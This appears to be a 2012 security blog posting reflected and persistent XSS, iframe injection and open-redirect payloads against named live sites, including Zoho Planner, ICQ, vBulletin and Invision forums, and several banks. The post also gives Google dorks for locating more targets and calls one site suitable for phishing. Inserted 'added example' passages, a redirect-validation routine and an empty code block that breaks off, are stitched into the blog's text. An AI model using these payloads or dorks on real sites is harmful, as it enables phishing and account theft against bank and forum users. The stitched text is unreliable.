<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-NXBr12I1PSk/T3HE4krdAII/AAAAAAAAA48/PC1i0JjRxPM/s1600/test.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://3.bp.blogspot.com/-NXBr12I1PSk/T3HE4krdAII/AAAAAAAAA48/PC1i0JjRxPM/s400/test.JPG" /></a></div><br />
<br />
<b>Video PoC:</b><br />
<br />
<iframe width="420" height="315" src="http://www.youtube.com/embed/y29v74xp6t0" frameborder="0" allowfullscreen></iframe><br />
<br />
<b>What about other versions? Maybe..</b><br />
<br />
<b>My Funny Quote</b> (posted 2012-03-26)<br />
In the Yahoo Messenger..<br />
<br />
<blockquote>[12:33] b0rntek: i want think<br />
[12:33] b0rntek: about bugs<br />
[12:33] b0rntek: what the best<br />
[12:33] b0rntek: my real life<br />
[12:34] b0rntek: or life with computer and bugs<br />
[12:34] b0rntek: i want made choice<br />
<br />
bla bla bla<br />
<br />
[12:43] b0rntek: i want made other important things etc in my life)<br />
[12:44] No One: and what exactly are these so "importnant" tings for wich you talk about?<br />
[12:46] b0rntek: put important things is right site, not an important things in the left side<br />
[12:47] No One: ohhh ...first i saw this-"put important things is right site " 0.o((((((((((((:</blockquote><br />
DJ b0rntek: <br />
<br />
<blockquote>put important things is right site</blockquote><br />
<blockquote>important things</blockquote><br />
<blockquote>is right site</blockquote><br />
<blockquote>site</blockquote><br />
<blockquote>site</blockquote><br />
<blockquote>site</blockquote><br />
<i>Does anyone! I need a doctor!</i><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://s19.rimg.info/a4c3b95c7e65a537156e1cbe5d8c4a47.gif" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="43" width="35" src="http://s19.rimg.info/a4c3b95c7e65a537156e1cbe5d8c4a47.gif" /></a></div>
<b>IFrame Injection/Cross Site Scripting Zoho Planner</b><br />
<b># Exploit Title: IFrame Injection/Cross Site Scripting Zoho Planner<br />
# Date: 26.03.2012<br />
# Author: Sony and Flexxpoint</b><br />
<b># Software Link:</b> https://planner.zoho.com/login.do<br />
<b># Web Browser : Mozilla Firefox</b><br />
<b># Blog Flexxpoint:</b> http://flexxpoint.blogspot.com/<br />
<b># Blog Sony:</b> http://st2tea.blogspot.com<br />
<b># Site :</b> http://insecurity.ro<br />
<b># PoC:</b><br />
http://st2tea.blogspot.com/2012/03/iframe-injection-zoho-planner.html<br />
<b>..................................................................</b><br />
<br />
<b>Well, we have a simple IFrame Injection in Zoho Planner. A lot of fields in Planner are vulnerable to IFrame Injection. <br />
<br />
Some pics:</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-TeEgX-Bolyo/T3BbmuhsWfI/AAAAAAAAA3o/GZ44l0hxilA/s1600/planner.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://1.bp.blogspot.com/-TeEgX-Bolyo/T3BbmuhsWfI/AAAAAAAAA3o/GZ44l0hxilA/s400/planner.JPG" /></a></div><br />
<b>And we can share this page:</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-kDhbFNr4Bts/T3BcA6qb9nI/AAAAAAAAA30/eAVwUeu0qSs/s1600/page.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://1.bp.blogspot.com/-kDhbFNr4Bts/T3BcA6qb9nI/AAAAAAAAA30/eAVwUeu0qSs/s400/page.JPG" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-cKc87zx7Jp8/T3BdPwYeq8I/AAAAAAAAA4A/brbijHo-R9U/s1600/zz.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-cKc87zx7Jp8/T3BdPwYeq8I/AAAAAAAAA4A/brbijHo-R9U/s400/zz.JPG" /></a></div><br />
<b>Links:</b><br />
<br />
https://planner.zoho.com/public/9cFPJ%2B9AHivFeKtB5e%2B2xnTSQcOn7WCf<br />
<br />
https://planner.zoho.com/public/9cFPJ%2B9AHivFeKtB5e%2B2xq%2BYywariZ7J<br />
<br />
<b>Video PoC: (simple)</b><br />
<br />
<br />
<iframe width="420" height="315" src="http://www.youtube.com/embed/gUlby00Ai04" frameborder="0" allowfullscreen></iframe><br />
<br />
<b>and Cross Site Scripting:</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://img62.imageshack.us/img62/9804/screenshot2732012.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="695" width="823" src="http://img62.imageshack.us/img62/9804/screenshot2732012.png" /></a></div><br />
<b>Persistent XSS.</b><br />
<br />
https://planner.zoho.com/public/umYocnKNsn3FeKtB5e%2B2xkj3SVhWUBnO<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-xqLeppn0Ljg/T3CtpbHOpiI/AAAAAAAAA4Y/qtSl4YKOP34/s1600/persistent.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-xqLeppn0Ljg/T3CtpbHOpiI/AAAAAAAAA4Y/qtSl4YKOP34/s400/persistent.JPG" /></a></div><br />
https://planner.zoho.com/public/umYocnKNsn3FeKtB5e%2B2xnTSQcOn7WCf<br />
<br />
<b>P.S. The IFrame Injection can be seen in the Zoho Bugtracker (change status).</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-ui927W7TCcE/T3BjV8cgG3I/AAAAAAAAA4M/0wq-pZCAGAc/s1600/zoho-status.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-ui927W7TCcE/T3BjV8cgG3I/AAAAAAAAA4M/0wq-pZCAGAc/s400/zoho-status.JPG" /></a></div><br />
<br />
<b>ICQ.com Cross Site Scripting</b> (Sony, published 2012-03-24T16:43:00.001-10:00)<br />
<br />
<b># Date: 25.03.2012<br />
# Author: Sony and Flexxpoint<br />
# Web Browser : Mozilla Firefox<br />
# Sony Blog: http://st2tea.blogspot.com<br />
# Flexxpoint Blog: http://flexxpoint.blogspot.com/<br />
..................................................................<br />
<br />
Good Place for XSS.</b><br />
<br />
http://validate.icq.com/icq/validate.html?uid=1%22%3E%3Cscript%3Ealert%28%22Sony%20and%20Flexxpoint%22%29%3C/script%3E&sid=23&lang=en<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-QzodBisslBU/T26GDHl_TFI/AAAAAAAAA2g/AxIb_cY8ZNk/s1600/icq1.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-QzodBisslBU/T26GDHl_TFI/AAAAAAAAA2g/AxIb_cY8ZNk/s400/icq1.JPG" /></a></div><br />
<br />
<b>vBulletin 3.8.x - 4.1.11 Cross Site Scripting</b> (Sony, published 2012-03-24T16:05:00.019-10:00)<br />
<br />
<b># Exploit Title: vBulletin 3.8.x - 4.1.11 Cross Site Scripting<br />
# Date: 25.03.2012<br />
# Author: Sony , Flexxpoint and .e0f<br />
# Software Link: https://www.vbulletin.com/<br />
# Web Browser : Mozilla Firefox<br />
# Blog Flexxpoint: http://flexxpoint.blogspot.com/<br />
# Blog Sony: http://st2tea.blogspot.com<br />
# Site : http://insecurity.ro<br />
..................................................................</b><br />
<br />
<b>Well, we have an interesting xss in vBulletin 4.1.10 - 4.1.11 (maybe other versions)<br />
<br />
We have xss in a lot of places.</b><br />
<br />
https://www.vbulletin.com/forum/blog.php<br />
https://www.vbulletin.com/forum/<br />
https://www.vbulletin.com/forum/group.php<br />
<b>etc..</b><br />
<br />
<br />
<b>Simple Example:</b><br />
<br />
https://www.vbulletin.com/forum/group.php<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-BGr5Gpx3hcU/T25sVUwAXOI/AAAAAAAAA1k/ZMIHWQ33RJM/s1600/demo.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="195" width="400" src="http://2.bp.blogspot.com/-BGr5Gpx3hcU/T25sVUwAXOI/AAAAAAAAA1k/ZMIHWQ33RJM/s400/demo.JPG" /></a></div><br />
<b>Click on URL and put our xss code in the URL:</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-u4MX7TvWS0I/T25tETfkJCI/AAAAAAAAA1w/eCYX2ANJAC8/s1600/demo2.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="248" width="400" src="http://2.bp.blogspot.com/-u4MX7TvWS0I/T25tETfkJCI/AAAAAAAAA1w/eCYX2ANJAC8/s400/demo2.JPG" /></a></div><br />
<b>And press the Ok button and the Preview Message button.<br />
</b><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Nu2V0B8a9X8/T25ueP3feZI/AAAAAAAAA18/PzTyykhnRsA/s1600/demo3.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-Nu2V0B8a9X8/T25ueP3feZI/AAAAAAAAA18/PzTyykhnRsA/s400/demo3.JPG" /></a></div><br />
<b>We can see the xss. It's in every place where we can use "url". <br />
<br />
How can you use this? idk..<br />
<br />
But I know what you can use..<br />
<br />
Create a new topic, put our xss in the "url" and click on Promote to Article..</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-jjoVibvT6Jc/T25w8Y44ihI/AAAAAAAAA2I/49o61qj0-Go/s1600/pr.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-jjoVibvT6Jc/T25w8Y44ihI/AAAAAAAAA2I/49o61qj0-Go/s400/pr.JPG" /></a></div><br />
<b>or Blog this Post..</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-Z1d0eiIjvAw/T25xa3qvmyI/AAAAAAAAA2U/mzmP5SU3qTA/s1600/blog.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://3.bp.blogspot.com/-Z1d0eiIjvAw/T25xa3qvmyI/AAAAAAAAA2U/mzmP5SU3qTA/s400/blog.JPG" /></a></div><br />
<b>It's hard, but possible.<br />
<br />
Simple Video PoC:</b><br />
<br />
<iframe width="420" height="315" src="http://www.youtube.com/embed/endyyK1rW4k" frameborder="0" allowfullscreen></iframe><br />
<br />
<b>Or example on</b> http://www.chinclub.ru/forum.php<br />
<br />
http://www.chinclub.ru/showthread.php?p=<b>257153</b><br />
<br />
<b>(It's a topic.) You can create another one with xss (for example).<br />
<br />
But we need to give a different link to users or the admin ..(the Blog this Post link)</b><br />
<br />
http://www.chinclub.ru/blog_post.php?do=newblog&p=<b>257153</b><br />
<br />
<b>And here we can see our persistent xss and..hmm..<br />
<br />
We tested this on some forums. It works. <br />
<br />
Demo vBulletin Forum. Version 4.1.10.</b><br />
<br />
https://www.vbulletin.com/admindemo.php<br />
<br />
<b>It works in other versions too. </b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Vxg5RZhIn_A/T28jy2jP4LI/AAAAAAAAA3E/TIxEYwKp8TE/s1600/go.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-Vxg5RZhIn_A/T28jy2jP4LI/AAAAAAAAA3E/TIxEYwKp8TE/s400/go.JPG" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-8xNUvB6bK6k/T28nFoaKuqI/AAAAAAAAA3c/sSsGRohMD6w/s1600/goha.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-8xNUvB6bK6k/T28nFoaKuqI/AAAAAAAAA3c/sSsGRohMD6w/s400/goha.JPG" /></a></div><br />
<br />
<b>And..<br />
<br />
Today I saw a clip by .e0f; it's about vBulletin too:<br />
<br />
http://vimeo.com/39049790<br />
<br />
The method is very interesting. It's not in "url".<br />
<br />
We can see it here:<br />
<br />
http://www.1337day.com/exploits/17824?utm_source=dlvr.it&utm_medium=twitter<br />
</b><br />
<br />
<iframe src="http://player.vimeo.com/video/39049790?title=0&byline=0&portrait=0" width="400" height="225" frameborder="0" webkitAllowFullScreen mozallowfullscreen allowFullScreen></iframe><p><a href="http://vimeo.com/39049790">vBulletin 4.1.10 XSS Vulnerability 2x</a> from <a href="http://vimeo.com/user10972566">root and toor</a> on <a href="http://vimeo.com">Vimeo</a>.</p>
<br />
<b>Invision Power Board 3.1.x -3.2.x Cross Site Scripting</b> (Sony, published 2012-03-24T06:04:00.014-10:00)<br />
<br />
<b># Exploit Title: Invision Power Board 3.1.x -3.2.x Cross Site Scripting<br />
# Date: 24.03.2012<br />
# Author: Flexxpoint and Sony<br />
# Software Link: http://www.invisionpower.com/products/board/<br />
# Web Browser : Mozilla Firefox<br />
# Blog Flexxpoint : http://flexxpoint.blogspot.com/<br />
# Blog Sony : http://st2tea.blogspot.com/<br />
# Site : http://insecurity.ro<br />
..................................................................<br />
<br />
Well, we have an interesting xss in Invision Power Board. But I cannot say with 100% certainty which versions may be vulnerable.<br />
<br />
Personal Messenger --> Compose New --> Other Recipients = our xss code. Press the Preview or Send Message button.<br />
<br />
Webmoney. </b><br />
<br />
http://forum.webmoney.ru/<br />
<br />
http://forum.webmoney.ru/index.php?app=members&module=messaging&section=send&do=send<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-jerfXHt98eI/T23S5UxlciI/AAAAAAAAA0o/p40B3Cu0UA8/s1600/webmoney.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-jerfXHt98eI/T23S5UxlciI/AAAAAAAAA0o/p40B3Cu0UA8/s400/webmoney.JPG" /></a></div><br />
<b>DrWeb.</b><br />
<br />
http://forum.drweb.com/index.php?<br />
<br />
http://forum.drweb.com/index.php?app=members&module=messaging&section=send&do=send<br />
<br />
http://forum.drweb.com/index.php?app=members&module=messaging<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-xgtveL5DBsQ/T23UCaBmt0I/AAAAAAAAA00/8AY-QqBjPJQ/s1600/drweb.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://3.bp.blogspot.com/-xgtveL5DBsQ/T23UCaBmt0I/AAAAAAAAA00/8AY-QqBjPJQ/s400/drweb.JPG" /></a></div><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://img861.imageshack.us/img861/989/screenshot2532012.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="683" width="864" src="http://img861.imageshack.us/img861/989/screenshot2532012.png" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://img718.imageshack.us/img718/989/screenshot2532012.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="673" width="849" src="http://img718.imageshack.us/img718/989/screenshot2532012.png" /></a></div><br />
<br />
<br />
<br />
<b>This is just another XSS hole that was fixed by Invision Power on 14.03.2012 but still exists in Dr.Web's forum because they were running unpatched software at the time of writing this post.</b><br />
<br />
<br />
<b>Pcworld.com<br />
(IP.Board 3.1.4) <br />
</b><br />
http://forums.pcworld.com/index.php?app=members&module=messaging&section=send&do=send<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-X334E6HGOR4/T23YVksxdoI/AAAAAAAAA1A/Q8JSLWcqI0Y/s1600/pcworld.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://3.bp.blogspot.com/-X334E6HGOR4/T23YVksxdoI/AAAAAAAAA1A/Q8JSLWcqI0Y/s400/pcworld.JPG" /></a></div><br />
<b>Governmentsecurity.org<br />
</b><br />
http://www.governmentsecurity.org/forum/index.php?app=members&module=messaging&section=send&do=send<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-cWkC9_5n1RM/T23cc5kVSZI/AAAAAAAAA1M/TbLI0RGCZ_E/s1600/sec.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-cWkC9_5n1RM/T23cc5kVSZI/AAAAAAAAA1M/TbLI0RGCZ_E/s400/sec.JPG" /></a></div><br />
<b>etc..a lot of web sites..<br />
<br />
This is not a critical bug, but it's a bug....</b><br />
<br />
<b>Various Banks Cross Site Scripting</b> (Sony, published 2012-03-21T11:17:00.011-10:00)<br />
<br />
<b># Title: Various Banks Cross Site Scripting<br />
# Author: Sony and Flexxpoint<br />
# Date: 21.03.2012<br />
# Sony Blog: http://st2tea.blogspot.com<br />
# Flexxpoint Blog : http://flexxpoint.blogspot.com/<br />
# Site: http://insecurity.ro</b><br />
<br />
<b>We staged an experiment out of interest. We looked through several randomly selected websites of the world's banks to check them for vulnerabilities. This was done rather quickly, even without any specialized software. The results were not surprising. We will demonstrate different bugs of the same type.<br />
<br />
Demo:</b><br />
<br />
http://www.banki.ru/bitrix/rku.php?id=829&goto=http://insecurity.ro<br />
<br />
<b>Good redirect in bitrix:<br />
<br />
inurl:bitrix/rk.php</b><br />
<br />
<br />
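The demo above relies on a redirect script that sends the browser to whatever URL the goto parameter holds. The following is an added example, not code from the original post or from Bitrix, of how a redirect endpoint can validate that parameter against an allowlist; the host names and the functions safeRedirectTarget and handleRedirect are hypothetical.

```javascript
// Added example: allowlist validation for a redirect endpoint that takes its
// target from a "goto" query parameter. Host names below are constructed.
const SITE_ORIGIN = 'https://www.example-bank.test';
const ALLOWED_HOSTS = new Set(['www.example-bank.test', 'partner.example-ads.test']);
const FALLBACK = SITE_ORIGIN + '/';

// Return a URL that is safe to place in a Location header, or the fallback.
function safeRedirectTarget(rawTarget) {
  if (typeof rawTarget !== 'string' || rawTarget.length === 0 || rawTarget.length > 2048) {
    return FALLBACK;
  }
  // Backslashes and control characters are normalised differently by browsers
  // and servers ("/\host", "ht\ttp://"), so they are refused outright.
  if (/[\u0000-\u001f\u007f\\]/.test(rawTarget)) return FALLBACK;

  let url;
  try {
    // Resolving against our own origin turns "/path" into a same-site URL and
    // exposes "//other.host/path" as the cross-site URL it really is.
    url = new URL(rawTarget, SITE_ORIGIN);
  } catch (err) {
    return FALLBACK;
  }
  if (url.protocol !== 'https:' && url.protocol !== 'http:') return FALLBACK; // javascript:, data:
  if (url.username !== '' || url.password !== '') return FALLBACK;           // trusted@other.host
  if (!ALLOWED_HOSTS.has(url.hostname)) return FALLBACK;
  // Return the parsed, normalised form, never the raw input string.
  return url.href;
}

// Minimal handler: read "goto" from the request URL and build the response.
function handleRedirect(requestUrl) {
  const params = new URL(requestUrl, SITE_ORIGIN).searchParams;
  return { status: 302, headers: { Location: safeRedirectTarget(params.get('goto')) } };
}

// Constructed requests: the first mirrors the shape of the demo URL above.
for (const req of [
  '/redirect?id=829&goto=http://insecurity.ro',
  '/redirect?id=829&goto=//insecurity.ro/landing',
  '/redirect?id=829&goto=%2Floans%3Fid%3D829',
  '/redirect?id=829&goto=https://partner.example-ads.test/c?id=829',
]) {
  console.log(req, '->', handleRedirect(req).headers.Location);
}
```
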
<b>http://www.citizensbank.com/ <br />
(U.S.)<br />
<br />
Simple (in the Search)</b><br />
<br />
http://www.citizensbank.com/search/?query=Secure%20Plan%22%22%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-VXe7DI33JZY/T2oaFz3lNsI/AAAAAAAAAxg/SI3qNHuHhTM/s1600/citiz.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://1.bp.blogspot.com/-VXe7DI33JZY/T2oaFz3lNsI/AAAAAAAAAxg/SI3qNHuHhTM/s400/citiz.JPG" /></a></div><br />
<br />
<b>https://www.wellsfargo.com/<br />
(U.S.)<br />
<br />
http://codepad.org/inXkWxYw</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-4D9eFxw2lEo/T2olrOdp20I/AAAAAAAAAyQ/I3tXgGCwy18/s1600/well.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-4D9eFxw2lEo/T2olrOdp20I/AAAAAAAAAyQ/I3tXgGCwy18/s400/well.JPG" /></a></div><br />
<br />
<b>http://www.eximb.com<br />
(Ukraine)</b><br />
<br />
http://www.eximb.com/rus/personal/everyday/internet_banking/?f=%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-Tr_xxEc7qb8/T2okk8UQDKI/AAAAAAAAAx4/18ytDW1-1vE/s1600/ukr.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-Tr_xxEc7qb8/T2okk8UQDKI/AAAAAAAAAx4/18ytDW1-1vE/s400/ukr.JPG" /></a></div><br />
<br />
<b>http://procreditbank.bg/main/bg/index.php<br />
(Bulgaria)</b><br />
<br />
https://probanking.procreditbank.bg/regist/default.asp?password2=%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-rcnxgpMMEWI/T2ok6TTg1MI/AAAAAAAAAyE/UohK8mVuWv8/s1600/bg.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-rcnxgpMMEWI/T2ok6TTg1MI/AAAAAAAAAyE/UohK8mVuWv8/s400/bg.JPG" /></a></div><br />
<b>http://www.sbrf.ru<br />
(Russia)</b><br />
<br />
http://www.sbrf.ru/moscow/ru/quotes/metals/timeline/index.php?qid190=1%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-FmhxD8hklgc/T2thGdbrbKI/AAAAAAAAA0U/V_E_q1uMoXw/s1600/sberbank.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-FmhxD8hklgc/T2thGdbrbKI/AAAAAAAAA0U/V_E_q1uMoXw/s400/sberbank.JPG" /></a></div><br />
<br />
<br />
<b>http://www.vtb24.ru<br />
(Russia)</b><br />
<br />
http://www.vtb24.ru/news/Pages/nizhnij-tagil.aspx?year=2012&category=%3C/script%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-9y23IS0u0eE/T2ooHfayKVI/AAAAAAAAAyc/ZnG7d5DkYxQ/s1600/vtb24.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-9y23IS0u0eE/T2ooHfayKVI/AAAAAAAAAyc/ZnG7d5DkYxQ/s400/vtb24.JPG" /></a></div><br />
<b>http://www.homecredit.ru/<br />
(Russia)<br />
<br />
https://online.homecredit.ru/ChatApp/login.jsp<br />
<br />
or..<br />
<br />
https://online.homecredit.ru/ChatApp/Chat/HtmlChatFrameSet.jsp<br />
<br />
We have an HTML code injection in the chat.</b><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-g6wV1CxgQ8s/T2oot2nrWrI/AAAAAAAAAyo/tzv1c88OOI4/s1600/%25D1%2585%25D0%25BE%25D1%2583%25D0%25BC%25D0%25BA%25D1%2580%25D0%25B5%25D0%25B4%25D0%25B8%25D1%2582.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://3.bp.blogspot.com/-g6wV1CxgQ8s/T2oot2nrWrI/AAAAAAAAAyo/tzv1c88OOI4/s400/%25D1%2585%25D0%25BE%25D1%2583%25D0%25BC%25D0%25BA%25D1%2580%25D0%25B5%25D0%25B4%25D0%25B8%25D1%2582.JPG" /></a></div><br />
<b>http://www.mastercardpremium.ru<br />
(Russia; not an official site, but good for an xss phishing attack)<br />
<br />
Simple.</b><br />
<br />
http://www.mastercardpremium.ru/search?phrase=%3Cscript%3Ealert%28%22XSS%22%29%3C/script%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-GNO4Jr9lqXI/T2optstPVbI/AAAAAAAAAy0/YlmZ6-244Bs/s1600/master.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-GNO4Jr9lqXI/T2optstPVbI/AAAAAAAAAy0/YlmZ6-244Bs/s400/master.JPG" /></a></div><br />
<br />
<b>http://www.raiffeisen.ch/web/home_de<br />
(Switzerland)</b><br />
<br />
http://www.raiffeisen.ch/raiffeisen/internet/rb0027.nsf/fAskForDeletionFile?ReadForm&File=%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-OhU-4_Ozyfo/T2pLUMNrBjI/AAAAAAAAAzw/hzjXJrKfkoA/s1600/1a.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://4.bp.blogspot.com/-OhU-4_Ozyfo/T2pLUMNrBjI/AAAAAAAAAzw/hzjXJrKfkoA/s400/1a.JPG" /></a></div><br />
<br />
<br />
http://boerse.raiffeisen.ch/raiffeisen2/listings/intraday.jsp?listing=998089,4,1&name=SM%22%3E%22%3E%3C/script%3E%3Cscript%3Eeval%28String.fromCharCode%2897,108,101,114,116,40,39,120,115,115,39,41%29%29%3C/script%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-xl85-SjlrgM/T2pLafEU3qI/AAAAAAAAAz8/mgJ-eVLojZA/s1600/2a.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-xl85-SjlrgM/T2pLafEU3qI/AAAAAAAAAz8/mgJ-eVLojZA/s400/2a.JPG" /></a></div><br />
<br />
<br />
<b>http://www.uwcfs.com/<br />
(Czech Republic)<br />
<br />
XSS in Chat. And we can see:<br />
<br />
http://www1.migbank.com/<br />
<br />
https://www.msufcu.org/<br />
<br />
Google Dorks: inurl:/phplive/message_box.php?theme=<br />
<br />
1 bug = a lot of web sites.</b><br />
<br />
https://secure.moneypolo.cz/phplive/message_box.php?theme=&l=admin&x=1&deptid=1%22%22%3E%3Cscript%3Ealert%28%22Cross%20Site%20Scripting%22%29%3C/script%3E<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-6Jj21EVa3KI/T2o_UdIZT_I/AAAAAAAAAzY/XaKAhlnwHXw/s1600/internetbank.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://3.bp.blogspot.com/-6Jj21EVa3KI/T2o_UdIZT_I/AAAAAAAAAzY/XaKAhlnwHXw/s400/internetbank.JPG" /></a><br />
</div><br />
<br />
<b>http://www.bcb.gob.bo/index.php<br />
(Bolivia)<br />
(but works only on old IE versions and IE-related browsers: Maxthon, Green, etc.)</b><br />
<br />
http://www.bcb.gob.bo/index.php?q=%22%20stYle=%22x:expre/**/ssion%28alert%28/XSS/.source%29%29%20&combos1_1=1&combos1_2=1&combos1_3=1&combos1_4=1&combos1_5=1&combos1_6=1&combos1_7=1&combos1_8=1&combos1_9=1&subcateg1=1&Submit=Buscar<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://img29.imageshack.us/img29/4543/screenshot2232012.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="722" width="811" src="http://img29.imageshack.us/img29/4543/screenshot2232012.png" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-usdHXZgWB3k/T2pCJXRUtVI/AAAAAAAAAzk/NQbnfe3RwRw/s1600/bolivia.JPG" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="300" width="400" src="http://2.bp.blogspot.com/-usdHXZgWB3k/T2pCJXRUtVI/AAAAAAAAAzk/NQbnfe3RwRw/s400/bolivia.JPG" /></a></div><br />
<br />
<br />
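The demo URLs above land in different output contexts: a quoted attribute value, an inline script string, and a script block that is closed early. The following is an added example, not code from the original post or from any of the listed sites, that renders four of the query values from those URLs into a constructed page template raw and then with context-specific encoding; the template and all function names are hypothetical, and the script runner is a simplified model of how a browser splits script elements.

```javascript
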